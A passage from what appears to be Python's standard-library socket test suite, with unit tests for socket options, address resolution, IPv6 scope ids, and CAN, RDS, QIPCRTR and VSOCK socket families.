reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
                self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
                              "not implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
        # Issue 17269: test the workaround for an OS X platform bug (segfault)
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
        # Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
        'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
        # open fd because on this path it doesn't actually verify the family
        # and type; it just populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
            # some OSes, like macOS, ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
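        # "=II" packs can_id and can_mask as two native-endian unsigned ints,
        # matching struct can_filter from <linux/can.h>; a received frame
        # passes the filter when (frame_id & can_mask) == (can_id & can_mask).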
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
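    # Both helpers use the can_frame_fmt layout defined on the CAN test base
    # class, which mirrors struct can_frame from <linux/can.h>: a 32-bit CAN
    # id, a one-byte data length code, padding, and up to eight data bytes.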
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
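        # The header packed above corresponds to struct bcm_msg_head from
        # <linux/can/bcm.h>; the nframes CAN frames (a single one here) are
        # appended directly after it in the same send() call.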
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
